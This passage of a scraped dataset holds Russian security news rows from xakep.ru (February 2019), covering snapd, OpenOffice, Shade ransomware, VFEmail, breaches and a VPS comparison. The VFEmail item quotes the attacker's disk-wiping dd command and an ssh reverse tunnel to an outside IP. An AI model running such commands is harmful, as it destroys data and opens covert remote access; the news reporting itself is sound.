  <content>В январе 2019 года ИБ-эксперт Крис Моберли (Chris Moberly) из австралийской компании The Missing Link обнаружил опасную уязвимость в snapd, которая получила имя Dirty Sock и идентификатор CVE-2019-7304. В настоящее время на GitHub уже были опубликованы proof-of-concept эксплоиты для этой проблемы, которая затрагивает Ubuntu и другие дистрибутивы. Dirty Sock не позволяет атакующему удаленно проникнуть на уязвимую машину, однако позволяет злоумышленнику повысить свои привилегии в уже зараженной системе до root-доступа, то есть захватить полный контроль. Исследователь пишет, что эксплуатация проблемы может варьировать от дистрибутива к дистрибутиву. Так, эксплоит dirty_sockv1 использует API create-user для создания локального пользователя, используя данные Ubuntu SSO. В свою очередь, эксплоит dirty_sockv2 используется для загрузки snap-пакета, содержащего install-хук для создания нового локального пользователя. Моберли объясняет, что snapd ставит под удар локальный сервер REST API, с которым snap-пакеты взаимодействуют во время установки новых snap’ов. Эксперт нашел способ обойти установленные ограничения и получить доступ ко всем функциям API, а в итоге и root-доступ. Специалист предупреждает, что баг можно эксплуатировать, напрямую выполнив вредоносный код на зараженной машине, а можно спрятав эксплоит в snap-пакете. Это довольно тревожная новость, так как в Snap Store ранее уже обнаруживали малварь. Перед проблемой Dirty Sock уязвимы все версии snapd от 2.28 до 2.37. Разработчики Canonical уже подготовили патч (USN-3887-1) и представили исправленный snapd 2.37.1. Так как snapd входит не только в состав Ubuntu, но и других дистрибутивов, обновления доступны для Debian, Arch Linux, OpenSUSE, Solus и Fedora.</content>
  <url>https://xakep.ru/2019/02/14/dirty-sock/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>7328e9ff-3a42-4746-9fff-a6f3255d1633</id>
  <title>Для 0-day уязвимости в OpenOffice появился неофициальный патч</title>
  <keywords>0day;0patch;Apache OpenOffice;RCE;Новости;Патчи;Уязвимости</keywords>
  <content>В начале февраля ИБ-специалист Алекс Инфур (Alex Inführ) сообщил об опасной RCE-уязвимости в составе опенсорсных LibreOffice и Apache OpenOffice (CVE-2018-16858). С помощью этого бага атакующий может добиться удаленного исполнения произвольного кода через автоматическое исполнение макросов. По сути, для срабатывания атаки пользователь должен просто провести курсором над вредоносной частью документа ODT. Напомню, что проблема оценивается в 7,8 баллов по шкале CVSS3, и исправление для нее выпустили только разработчики LibreOffice, тогда как «заплатки» для OpenOffice до вчерашнего дня не существовало, хотя PoC-эксплоит был опубликован две недели тому назад. Теперь патч для уязвимости подготовили специалисты компании ACROS Security, разрабатывающей 0patch. Данная платформа предназначенная как раз для таких ситуаций, то есть исправления 0-day и других непропатченных уязвимостей, для поддержки продуктов, которые уже не поддерживаются производителями, кастомного софта и так далее. Хотя проблема в OpenOffice затрагивает версии для Linux и Windows, микропатч ACROS Security пока работает только для Windows-версии. Note: the micropatch only applies to the latest version of OpenOffice for Windows (version 4.1.6). In addition to this micropatch, we also released two micropatches (32-bit and 64-bit) for the same issue in the latest vulnerable version of LibreOffice (version 6.1.2.1). — 0patch (@0patch) February 13, 2019 Вместе с исправлением эксперты опубликовали видео, демонстрирующее эксплуатацию уязвимости на примере непропатченного OpenOffice.</content>
  <url>https://xakep.ru/2019/02/14/openoffice-micropatch/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>b6ff42a1-16d7-435c-918a-8d01c6b94ebe</id>
  <title>Премиальные VDS/VPS отечественных провайдеров. Сравниваем услуги по соотношению цены и производительности</title>
  <keywords>VDS;VPS;Статьи;Хостинг</keywords>
  <content>В забеге будут участвовать FirstVDS, 1cloud, cloud4y, UltraVDS, bigd.host и RuVDS. Думаю, такого количества достаточно, чтобы объективно оценить ситуацию на отечественном рынке. Для теста возьмем работающие под управлением Windows Server мощные VPS/VDS, построенные на быстром железе. Рассмотрим три категории: начального и среднего уровня, а также продвинутые серверы — в каждой категории будем, насколько это возможно, ориентироваться на один ценовой диапазон и проверим, что можно получить у разных хостеров за те же деньги. Если минимальный ценник провайдера выше среднего, берем виртуальную машину в минимальной для соответствующего диапазона конфигурации. Если провайдер не предлагает премиальные конфигурации, возьмем конфигурацию попроще, более или менее похожую. Нас в данном случае больше волнуют деньги, а не гигабайты с мегагерцами. Под конфигурацией начального уровня для Windows Server мы подразумеваем два вычислительных ядра, 2 Гбайт оперативной памяти и SSD-накопитель на 20 Гбайт — это необходимый минимум, от которого придется отталкиваться, даже если у провайдера есть варианты попроще. В теории серверные версии Windows могут работать и на более слабых машинах, но издевательства над организмом в этой статье мы не рассматриваем. Здесь сразу определился аутсайдер — bigd.host. Предлагаемые этой компанией варианты явно слабее нужной нам конфигурации, но они и гораздо дешевле средних по рынку. Есть и явные лидеры: цены на услуги cloud4y гораздо выше среднего в нашей минимальной конфигурации. Насколько это оправданно, будем смотреть на тестах. Конфигурация среднего уровня — это три вычислительных ядра, 3 Гбайт оперативной памяти и SSD на 80 Гбайт. Здесь у нас лидеры и аутсайдеры по ценам и конфигурациям те же, что в предыдущем случае. Впрочем, смотри сам. В таблице все наглядно отражено. Высокопроизводительный сервер без компромиссов — это минимум восемь вычислительных ядер, 16 Гбайт оперативной памяти и SSD на 120 Гбайт. Провайдеры, продающие виртуальные машины, иногда декларируют некий коэффициент готовности (UPTIME) центра обработки данных, в котором размещено их оборудование. Как правило, он составляет 99,98% — столько времени ЦОД (а соответственно, и ваш VPS/VDS без учета возможных аппаратных неисправностей сервера, глюков установленного ПО и проблем с ИТ-инфраструктурой хостера) должен гарантированно работать. В основе этих цифр — статистика сбоев и плановых установок, собранная организацией Uptime Institute во множестве дата-центров. Если верить ей, коэффициент готовности инженерной инфраструктуры дата-центра уровня Tier III (самый ходовой для коммерческих ЦОДов) составляет 99,982%, а для Tier II — 99,972%. Пусть эти показатели не вводят вас в заблуждение: реальный коэффициент готовности объекта определяется на основе собранной по нему индивидуальной статистики. Uptime Institute опубликовал данные много лет назад, они касаются только инженерной инфраструктуры (не затрагивают ИТ-нагрузку) и представляют собой «среднюю температуру по больнице», которую сегодня уже нельзя считать актуальной. Маркетологи компаний-провайдеров взяли красивые цифры на вооружение и пустили в обиход очередной миф. Тем не менее, если компания готова взять на себя ответственность и прописать коэффициент готовности инженерной инфраструктуры ЦОДа в SLA, это дополнительный плюс. Слишком большое количество участников не позволяет провести дорогостоящее нагрузочное тестирование с близкими к реальным профилями нагрузки. Мы решили ограничиться поверхностной проверкой работоспособности каналов связи и синтетическими тестами с использованием популярных утилит. Такой подход позволит грубо сравнить виртуальные машины и сделать вывод о соотношении стоимости услуги и возможностей сервера. В результате удастся понять, в каком случае затраты будут более эффективны. В качестве клиентской машины возьмем еще один виртуальный сервер внешнего по отношению ко всем участникам провайдера, чтобы подопытные были в более или менее равных условиях. Проверять каналы связи будем только на одной конфигурации каждого провайдера — нет смысла гонять их все. Сначала мы пропинговали виртуальные серверы сотней маленьких (64 байт) и сотней больших (1 Кбайт) пакетов: потерь в процессе тестирования не было, а время отклика оказалось практически одинаковым, что неудивительно. Понятно, что глубокое нагрузочное тестирование каналов нужно делать в разное время суток, а состоять оно должно из нескольких итераций и статистической обработки результатов. Для нашей поверхностной проверки это все не нужно — и так понятно, что сетевые возможности виртуальных серверов участвующих в обзоре провайдеров примерно равны. Для проверки вычислительных возможностей виртуальных машин традиционно используем популярную утилиту. Она позволяет провести более двух десятков тестов в нескольких категориях: Cryptography, Integer, Floating Point, Memory. Тут используются алгоритмы сжатия, работа с JPEG, парсинг HTML, SQLite — GeekBench считается одним из наиболее всесторонних тестов для Windows. Не затрагивает он, пожалуй, только дисковую подсистему, поэтому ее мы проверим с помощью CrystalDiskMark. Результаты тестирования близки к ожидаемым и соответствуют заявленным провайдерами конфигурациям. Важно понимать, что синтетический тест не отражает реальных рабочих нагрузок, в процессе эксплуатации может возникнуть совершенно иная ситуация — это очень сильно зависит от сценариев использования сервера. Еще один распространенный бенчмарк, который позволяет провести тестирование последовательной и случайной записи/чтения с глубиной очереди 1, 8 и 32. Результаты тестирования сведены в диаграмму, и здесь хорошо заметен некоторый разброс в производительности. У ряда провайдеров порог явно выше, но утилита не смогла нагрузить дисковую подсистему настолько, чтобы до него дойти. Здесь MB/s — это 1 000 000 байт/с (для сравнения у SATA 600 — 600 000 000 байт/с), KB равен 1000 байт, KiB — 1024 байт. Хотелось бы отметить, что все провайдеры идут практически вровень за исключением предлагающих явно более слабые конфигурации FirstVDS и bigd.host. Также наблюдается заметное по сравнению с прогнозируемым снижение результатов теста (относительно общего уровня) GeekBench у виртуальных серверов UltraVDS средней и высокой производительности. Трудно сказать, с чем оно связано, поверхностных синтетических тестов недостаточно для детального препарирования работы виртуальных машин. По результатам работы утилиты CrystalDiskMark явных лидеров выделить тоже трудно, хотя по некоторым показателям UltraVDS и cloud4y обошли конкурентов, а производительность HDD bigd.host ожидаемо оказалась заметно ниже, чем у SSD других участников. В целом рассмотренные варианты (кроме двух явных аутсайдеров) можно считать примерно равнозначными, а потому нам остается только сравнить цены. Стоимость услуг bigd.host значительно ниже, чем у конкурентов, что вполне естественно, если учесть более скромные характеристики виртуальных серверов. В большую сторону заметно выделяются, пожалуй, только цены у cloud4y. Если судить по сайту, этот провайдер ориентирован на достаточно крупных корпоративных заказчиков, покупающих частные облака и услуги SaaS. Рискнем предположить, что компания просто не заинтересована в мелких клиентах, покупающих виртуальные серверы в розницу, и потому ставит для них заградительные тарифы. Также хотелось бы выделить из общего списка участников провайдера RuVDS. Их серверы показали высокие результаты в тестах при относительно невысоких ценах: по соотношению цена/производительность — первое место.</content>
  <url>https://xakep.ru/2019/02/14/russian-vps/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>9bc63cc9-ed8d-46a5-aa17-5278bd1a922d</id>
  <title>Вымогатель Shade атакует российские компании</title>
  <keywords>Shade;Вымогательский софт;Новости;Социальная инженерия;Спам;Шифровальщик</keywords>
  <content>Специалисты ESET и «Лаборатории Касперского» предупредили о новой волне фишинговых писем, с помощью которых распространяется шифровальщик Shade. Аналитики отмечают, что нельзя сказать, что на этот раз злоумышленники придумали что-то принципиально новое, однако они профессионально пользуются известными уловками, и эксперты сочли нужным еще раз предупредить сотрудников компаний. Письма злоумышленников, как правило, замаскированы под уведомления от каких-либо известных брендов (например, «Бинбанка» или розничной сети «Магнит»). Жертва получает короткое письмо, подписанное якобы сотрудником компании, название которой на слуху. В самом письме минимум деталей — сообщение «Высылаю подробности заказа» и либо URL, выглядящий как ссылка на облачное хранилище документов, либо вложение. Распознать такую подделку можно по несоответствию адреса отправителя и данных в подписи: разные фамилии и домены сразу бросаются в глаза. В письме часто присутствует строка, имитирующая отметку о проверке каким-либо защитным решением, — злоумышленники считают, что так письмо вызовет больше доверия. По приведенной в послании ссылке жертву, разумеется, ожидает троян. Вариант с вложением немного интереснее. В нем содержится документ (к примеру, PDF-файл или DOCX), имитирующий интерфейс облачного сервиса. На иллюстрации ниже можно увидеть пример системы электронной отчетности и документооборота СБИС из файла PDF. Конечно, при попытке «напечатать документы на экран» скачивается все тот же шифровальщик. Эксперты ESET также пишут о вариантах писем, во вложениях которых находится ZIP-архив, содержащий JavaScript-файл под названием «Информация.js»; после извлечения и запуска этот файл скачивает вредоносный загрузчик, детектируемый продуктами ESET как Win32/Injector. Загрузчик запускает финальную полезную нагрузку – вымогатель Shade (он же Troldesh). Специалисты «Лаборатории Касперского» напоминают, что несколько лет назад эту малварь уличили в том, что она не только блокирует данные, но и проверяет по ряду признаков, не в бухгалтерии ли работает жертва, и при необходимости вместо шифрования устанавливает на зараженную машину инструменты удаленного доступа. Но чаще Shade действует по «классической схеме»: шифрует файлы по заранее сформированному списку расширений, выводит на рабочий стол сообщение с требованием выкупа и создает файл с условиями разблокировки. До данным ESET, на текущий момент Shade проявляет наибольшую активность в России (более 52% от всех обнаруженных вредоносных вложений). Также атаке вымогателя подверглись пользователи Германии, Японии и Украины.</content>
  <url>https://xakep.ru/2019/02/14/new-shade-wave/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>63116b5d-bdbd-4620-8cde-806178aa0b72</id>
  <title>В феврале Microsoft исправила более 70 уязвимостей в своих продуктах</title>
  <keywords>Adobe;IE;Microsoft;Patch Tuesday;RCE;Браузеры;Новости;Уязвимости</keywords>
  <content>Февральский «вторник обновлений» принес патчи для 77 уязвимостей, 20 из которых были критическими. Исправления затронули самые разные продукты компании, начиная от браузера Microsoft Edge и заканчивая Azure IoT SDK. Одной из наиболее опасных проблем этого месяца стала уязвимость нулевого дня в Internet Explorer (CVE-2019-0676), которую, по словам разработчиков, уже эксплуатируют хакеры. Баг допускает раскрытие информации и связан с тем, как IE обрабатывает объекты в памяти. То есть с его помощью атакующий может проверить наличие любых файлов на жестком диске жертвы. Проблему обнаружили эксперты Google Project Zero и они же сообщили, что уязвимостью уже пользуются злоумышленники. Также была устранена проблема эксплуатации опасной уязвимости PrivExchange, известно о которой стало еще в январе текущего года. Напомню, что баг позволяет атакующему повысить привилегии любого аккаунта до администратора на контроллере домена, и для эксплуатации проблемы было достаточно простой Python-утилиты, уже доступной в открытом доступе. Среди других серьезных проблем месяца можно выделить RCE-уязвимость в SMBv2 (CVE-2019-0630), которая позволяет аутентифицированному пользователю выполнить произвольный код на другой машине. Баг работает через отправку специально подготовленных пакетов целевому серверу SMBv2. Еще одна критическая проблема связана с DHCP (CVE-2019-0626). В этом случае вредоносные пакеты, направленные уязвимому DHCP-серверу, могут привести к его компрометации через исполнение произвольного кода. Подробный разбор исправленных проблем уже традиционно опубликовали специалисты Trend Micro Zero-Day Initiative. Также стоит сказать, что патчи для своих продуктов представили и разработчики Adobe. В феврале «заплатки» получили Adobe Flash Player, Adobe Acrobat/Reader, язык ColdFusion, а также десктопная версия Creative Cloud. Из 75 исправленных уязвимостей 71 относилась к Adobe Acrobat и Reader.</content>
  <url>https://xakep.ru/2019/02/13/february-patches/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>5b4ba1b0-f419-4c8a-bac4-ffea48a93e71</id>
  <title>Sailfish как замена Android. Изучаем операционную систему, которая освободит твой телефон от гнета Google</title>
  <keywords>Android;Google;Linux;Sailfish;Выбор редактора;Обзоры;Операционные системы;Статьи</keywords>
  <content>Sailfish переводится как «рыба-парусник», а jolla — это по-фински «лодочка», родственник нашего ялика. Вот такая рыбацкая терминология. На самом деле у Android есть и другие конкуренты, например Tizen. Но все же Sailfish — единственная система, которую можно установить на некоторые смартфоны прямо сейчас, плюс Jolla успела выпустить пару моделей под своей маркой, и эти аппараты все еще присутствуют на рынке. Sailfish — это, по сути, прямой наследник операционки Meego. Эту систему ты, возможно, успел увидеть в аппарате Nokia N9. Meego — полноценный Linux, обладающий, помимо ядра, привычным набором компонентов, таких как Systemd, Pulseaudio и Wayland. Никаких виртуальных Java-машин, только хардкор! Пользовательская среда — самобытная разработка Jolla, написанная на Qt 5 и QML. Управление в Sailfish построено на жестах и касаниях, поэтому отдельной кнопки Home системе не требуется. Для разблокировки нужно дважды коснуться экрана и затем смахнуть его в сторону. Навигация по системе строится на свайпах. Центральный экран занимает список приложений, который можно пролистывать. Делаем свайп вниз — вылезает шторка с типами подключений, небольшой свайп вверх — появляется нижний док с избранными приложениями, а если потянуть сильнее — покажется основная сетка приложений. Пролистывая экраны в стороны, можно переключаться между тремя основными режимами: сеткой приложений, экраном уведомлений и миниатюрами запущенных задач. Виртуальных рабочих столов, как в Android, тут нет, но к этому быстро привыкаешь. Часть UI написана с использованием Silica — собственного расширения QML, которое Jolla не отдает сообществу (так же как и движок «умного» ввода текста). Все остальное имеет открытый исходный код. Что касается аппаратов, на которых работает эта ОС, то это Jolla Jolla (sic!), Jolla C, Inoi R7 (смартфон среднего уровня под отечественным брендом) и несколько региональных моделей, названия которых вряд ли тебе что-то скажут. М-да, негусто… Но парни в Jolla вовремя подсуетились и поучаствовали в программе Sony Open Devices. Результатом стало создание отдельной версии Sailfish X для смартфонов Sony Xperia X и XA2. Это уже другое дело! Имея современную «соньку», можно заменить Android на Sailfish и вдохнуть воздух свободы полной грудью… Но, как в анекдоте, тут есть нюанс. Ты, конечно, знаешь, что операционка без собственной экосистемы приложений мало чего стоит. Вокруг Jolla существует сплоченное, но все же маленькое сообщество, которое потихоньку пилит программы под свою любимую систему. «Из коробки» в Sailfish есть неплохой набор приложений, включая вполне годный веб-браузер на Gecko. Но этого, конечно, мало. Есть сайт openrepos.net — что-то вроде COPR в Fedora или OBS в openSUSE. Там можно найти много всего, но качество софта… не очень. Понимая, что с такими ресурсами на рынке удержаться невозможно, основатели Jolla договорились со швейцарской компанией Myriad Group AG о лицензировании их продукта Alien Dalvik — сторонней реализации Android runtime. Для Sailfish стали доступны тысячи приложений из мира Android. Входной барьер низок как никогда: достаточно уметь скачивать файлы APK по ссылкам из Google Play. В итоге, помимо Storeman (клиента для OpenRepos), в системе имеется полноценный «фирменный» клиент магазина Jolla, где примерно половина ассортимента помечена значком с роботом — это и есть приложения с Android. Интеграция с ними максимально бесшовная. Второй момент, который тоже очень важен, — это наличие в операционной системе драйверов, позволяющих ей нормально поддерживать сторонние аппараты со всеми их датчиками и сенсорами. Со времен Nokia N9 (а это 2011 год) упомянутую проблему так никто и не решил, поэтому нативных драйверов для мобильного железа в Sailfish почти нет. Материалы из последних выпусков можно покупать отдельно только через два месяца после публикации. Чтобы продолжить чтение, необходимо купить подписку. Подписка позволит тебе в течение указанного срока читать ВСЕ платные материалы сайта. Мы принимаем оплату банковскими картами, электронными деньгами и переводами со счетов мобильных операторов. Подробнее о подписке 7190 р. 720 р.</content>
  <url>https://xakep.ru/2019/02/13/sailfish/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>e87e2592-f4a8-4521-935e-cf2ed8409c03</id>
  <title>Обнаружена странная фишинговая кампания со ссылками длиной около 1000 символов</title>
  <keywords>Мошенники;Новости;Социальная инженерия;фишинг;Электронная почта</keywords>
  <content>Основатель сайта BleepingComputer и ИБ-эксперт Лоренс Абрамс (Lawrence Abrams) рассказал о странной фишинговой кампании, впервые замеченной сотрудниками My Online Security. These phishing scams are really getting annoying with all the ultra long urls It is getting ridiculous. @Spam404Online @BleepinComputer @malwrhunterteam @0x736A @illegalFawn pic.twitter.com/7yLmQTE80m — My Online Security (@dvk01uk) February 11, 2019 Фишеры присылают пользователям таргетированные послания, в которых убеждают своих жертв в том, что их почтовые ящики попали в некий «черный список» из-за многочисленных неудачных попыток входа. Чтобы исправить ситуацию, жертва должна перейти по предлагаемой злоумышленниками ссылке и пройти верификацию, в противном случае аккаунт якобы будет удален окончательно. Перейдя по такой ссылке, пользователь попадет на лендинг злоумышленников, замаскированный под страницу конкретного почтового домена. При этом ссылки в таких сообщениях выглядят крайней странно и могут насчитывать почти 1000 символов в длину. Пример одного из таких URL-адресов можно увидеть на иллюстрации ниже. Абрамс пишет, что пока не удалось понять, зачем злоумышленникам понадобились такие странные ссылки. Можно предложить, что преступники пытаются скрыть в них какую-то информацию или маскируют свои намерения столь экзотическим способом. Эксперт отмечает, что при этом преступники, скорее всего, мешают сами себе, потому как адрес длиной в 1000 символов может вызвать подозрения даже у самого «непродвинутого» пользователя.</content>
  <url>https://xakep.ru/2019/02/13/long-urls/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>1dd10e1b-91b1-496d-b31a-44a4e73f941c</id>
  <title>Баг в macOS дает любым приложениям доступ к истории браузера</title>
  <keywords>Apple;macOS;История браузера;Новости;Утечка информации;Уязвимости</keywords>
  <content>Разработчик Джефф Джонсон (Jeff Johnson) обнаружил опасную уязвимость, затрагивающую все версии macOS Mojave, включая новейшую macOS Mojave 10.14.3. Джонсон объясняет, что в macOS доступ к некоторым директориям ограничен по умолчанию. К примеру ~/Library/Safari доступна лишь ограниченному числу системных приложений, таких как Finder. Однако исследователь выяснил, что эти запреты можно обойти, после чего доступ к ~/Library/Safari может получить вредоносное приложение, причем без запроса каких-либо дополнительных прав от системы или пользователя. «Никакого диалога о разрешении нет, это просто работает. Таким образом вредоносное приложение может втайне нарушить приватность пользователя и изучить историю его браузера», — рассказывает Джонсон. Специалист уже уведомил о проблеме инженеров Apple, и так как патча пока нет, он не разглашает технические детали уязвимости, чтобы не подвергать пользователей риску. В беседах с журналистами Джонсон сообщил, что корень проблемы кроется в API для разработчиков. Джонсон подчеркивает, что удаленная эксплуатация найденной им проблемы, к счастью, невозможна, то есть сначала пользователь должен будет установить вредоносное приложение на свою машину. Однако также исследователь отмечает, что никаких способов защиты от этой проблемы нет.</content>
  <url>https://xakep.ru/2019/02/13/macos-bug/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>fbdab948-b1d5-42dc-956b-c8a80a2ea6d5</id>
  <title>Хакеры уничтожили данные почтового сервиса VFEmail</title>
  <keywords>VFEmail;Взлом;Новости;Почтовый сервер;Электронная почта</keywords>
  <content>Представители защищенного почтового сервиса VFEmail сообщили, что, скорее всего их ресурсу пришел конец, и он вряд ли снова заработает в полном объеме. Дело в том, что в минувший понедельник, 11 февраля 2019 года, неизвестные злоумышленники проникли на американские серверы проекта и уничтожили там все данные, до которых только смогли добраться. At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there. — VFEmail.net (@VFEmail) February 11, 2019 Not 'A', an entire infrastructure. Mail hasts, VM hosts,sql server cluster, hosted vms. If they all had one password, sure, but they didn't. That's the scary part. — Havokmon (@Havokmon) February 12, 2019 Представители VFEmail пишут, что взломщики буквально отформатировали диски на всех машинах, и в результате были потеряны все виртуальные машины, все бекапы и файловый сервер. «Да, VFEmail практически уничтожен. Скорее всего, он уже не вернется. Никогда не думал, что кого-то будет настолько волновать мой безвозмездный труд, что его захотят целиком и полностью уничтожить», — пишет основатель VFEmail, Рик Ромеро (Rick Romero) у себя в Twitter. В настоящее время специалисты VFEmail пытаются хотя бы частично восстановить работу сервиса. Судя по обновляющемуся сообщению на главной странице официального сайта, отправка писем уже частично работает (по крайней мере, для платных пользователей), однако американские пользователи обнаружат свои аккаунты девственно чистыми, и их данные, судя по всему, восстановить уже не удастся. Также пока не функционируют кастомные фильтры, проверки на спам и так далее.  Сообщается, что взломщики не пытались шантажировать владельцев сервиса и требовать выкуп. Судя по всему, уничтожение данных являлось основной целью этой странной атаки. В Twitter Ромеро подчеркивает, что пострадавшие части инфраструктуры VFEmail не имели одинаковых или слабых паролей. Что именно сделали злоумышленники и как сумели нанести VFEmail такой урон, пока еще только предстоит выяснить. This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down. — VFEmail.net (@VFEmail) February 11, 2019 Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N — VFEmail.net (@VFEmail) February 11, 2019 Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy. — VFEmail.net (@VFEmail) February 11, 2019 Фото: Depositphotos</content>
  <url>https://xakep.ru/2019/02/13/rip-vfemail/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>7bf0ac85-f66c-4098-b356-042e3dc26dfb</id>
  <title>Информация о 620 млн учетных записей выставлена на продажу в даркнете</title>
  <keywords>Dream Market;Взлом;Новости;Пароли;Утечка данных</keywords>
  <content>Издание The Register сообщило, что в даркнете, на торговой площадке Dream Market, были выставлены на продажу данные 620 миллионов пользователей 16 крупных сайтов, включая Dubsmash, MyFitnessPal и MyHeritage. За этот дамп злоумышленники суммарно просят около 20 000 долларов (в биткоинах) и заявляют, что в него входит информация о следующих учетных записях: Dubsmash (162 млн), MyFitnessPal (151 млн), MyHeritage (92 млн), ShareThis (41 млн), HauteLook (28 млн), Animoto (25 млн), EyeEm (22 млн), 8fit (20 млн), Whitepages (18 млн), Fotolog (16 млн), 500px (15 млн), Armor Games (11 млн), BookMate (8 млн), CoffeeMeetsBagel (6 млн), Artsy (1 млн), а также DataCamp (700 000). Интересно, что перечисленные базы также можно приобрести и отдельно, цена в биткоин-эквиваленте начинается от нескольких сотен долларов и заканчивается в районе 2000 долларов за штуку. Большая часть дампов датирована 2018 годом, но также есть базы 2016-2017 годов (Whitepages, а также MyHeritage и CoffeeMeetsBagel). Журналисты издания смогли изучить образцы данных, представленных в базе злоумышленников, и сообщили, что на их взгляд те выглядят настоящими: содержат email-адреса, имена пользователей и пароли. В основном пароли зашифрованы или хешированы, то есть перед использованием их придется взламывать. Судя по всему, финансовой информации пользователей в дампах нет, однако (в зависимости от сайта) в базах также встречаются данные о местоположении, токены аутентификации социальных медиа и другие детали. Продавец дампа, с которым удалось пообщаться журналистам, рассказал, что в общей сложности в его распоряжении имеется порядка 20 различных баз, некоторые из которых он собирается выставить на продажу, а другие приберегает для личного пользования. Суммарно эти «сборники» включают в себя информацию примерно о миллиарде различных аккаунтов, а самые старые утечки датированы еще 2012 годом. После выхода публикации The Register, многие из перечисленных компаний вынуждены были признать, что действительно пострадали от атак и теперь уведомляют о случившемся пользователей или даже принудительно сбрасывают пароли. Так, уже начали проводить расследования и поблагодарили журналистов Dubsmash, 500px, EyeEm, CoffeeMeetsBagel, DataCamp.</content>
  <url>https://xakep.ru/2019/02/12/16-sites-leaks/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>26f9a472-11a6-423a-bf64-b4c597b2029a</id>
  <title>Баг в плагине для WordPress может использоваться для захвата сайтов</title>
  <keywords>CMS;Simple Social Buttons;WordPress;Новости;плагины;Уязвимости</keywords>
  <content>Специалисты компании WebARX обнаружили опасную проблему в популярном плагине для WordPress, Simple Social Buttons, предлагающем простые кнопки социальных сетей для сайтов. По словам исследователей, баг кроется в самом дизайне приложения и усугубляется некорректной проверкой прав. Если потенциальный атакующий может зарегистрировать новый аккаунт на уязвимом сайте, то эксплуатируя баг, он также способен внести изменения в настройки CMS, то есть выйти далеко не за пределы возможностей, предусмотренных для плагина изначально. По сути, злоумышленник может разместить на сайте бэкдор или перехватить управление учетной записью администратора. Видеоролик ниже показывает, как баг используется для смены почтового адреса учетной записи администратора. Перед публикаций информации о проблеме исследователи уведомили о баге разработчиков плагина, компанию WPBrigade. Те уже выпустили Simple Social Buttons версии 2.0.22, где уязвимость была исправлена. Администраторов уязвимых сайтов призывают установить обновление как можно скорее, или отключить регистрацию пользователей. Дело в том, что, согласно официальной статистике, плагин установлен более чем на 40 000 сайтов, и теперь все эти ресурсы могут стать мишенями для операторов ботнетов и других злоумышленников.</content>
  <url>https://xakep.ru/2019/02/12/simple-social-buttons/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>73a9fe2f-6c65-4e39-b47b-8f77b4ad7598</id>
  <title>Госдума приняла в первом чтении законопроект «о суверенном рунете»</title>
  <keywords>Законопроект;Интернет;Новости;Россия;Рунет</keywords>
  <content>В декабре 2018 года сенаторы Андреем Клишас и Людмила Боковая, а также депутат Андрей Луговой, внесли в Госдуму законопроект №608767-7, направленный на защиту устойчивой работы рунета. Документ быстро стал известен как законопроект о «суверенном интернете» или «об изоляции рунета», он предусматривает внесение поправок в законы «О связи» и «Об информации, информационных технологиях и о защите информации». Законопроект направлен на защиту рунета от внешних угроз и должен позволить российским властям контролировать точки соединения российского сегмента интернета с внешним миром. То есть в случае необходимости инфраструктура рунета должна быть способна работать в полной изоляции. Причем в пояснительной записке к документу сказано, что тот «подготовлен с учетом агрессивного характера принятой в сентябре 2018 года стратегии национальной кибербезопасности США, где декларируется принцип сохранения мира силой». Законопроект определяет необходимые правила маршрутизации трафика. Еще одна цитата из пояснительной записки: «Создается возможность для минимизации передачи за рубеж данных, которыми обмениваются между собой российские пользователи. Определяются трансграничные линии связи и точки обмена трафиком. Их владельцы, операторы связи обязываются при возникновении угрозы обеспечить возможность централизованного управления трафиком». Сегодня, 12 февраля 2019 года, законопроект был принят в первом чтении, и на страницах «Роскомсвободы» уже можно найти подробную расшифровку заседания Госдумы. Напомню, что ранее один из авторов инициативы, Андрей Клишас, утверждал, что на исполнение закона будет потрачено 20 миллиардов рублей. Причем в обосновании к законопроекту он писал, что бюджетных средств на его инициативу практически не потребуется. Затем «Интерфакс» сообщал, что в ближайшие три года три года на законопроект планируют потратить более 1,8 млрд рублей, и средства на создание Центра управления сетью связи общего пользования предусмотрены в бюджете на 2019 год в размере почти 600 млн рублей. Сегодняшнее обсуждение в Госдуме, к сожалению, ясности не добавило, и в вопросах финансирования проекта по-прежнему кроется множество неизвестных. Также стоит отметить, что ранее законопроект уже раскритиковали эксперты и представители отрасли. Так, члены Экспертного совета при Правительстве РФ сообщали, что законопроект имеет недостаточно прозрачные цели, предлагает дублировать полномочия разных органов, не конкретизирует «в чем конкретно состоят угрозы», а реализация законопроекта на деле, скорее всего, потребует огромных финансовых вливаний.</content>
  <url>https://xakep.ru/2019/02/12/standalone-runet/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>36020083-9fcc-4254-a5b8-12e4984caa7d</id>
  <title>Вскрыть и изучить. Полный гайд по потрошению домашних гаджетов</title>
  <keywords>Выбор редактора;Гаджеты;Статьи</keywords>
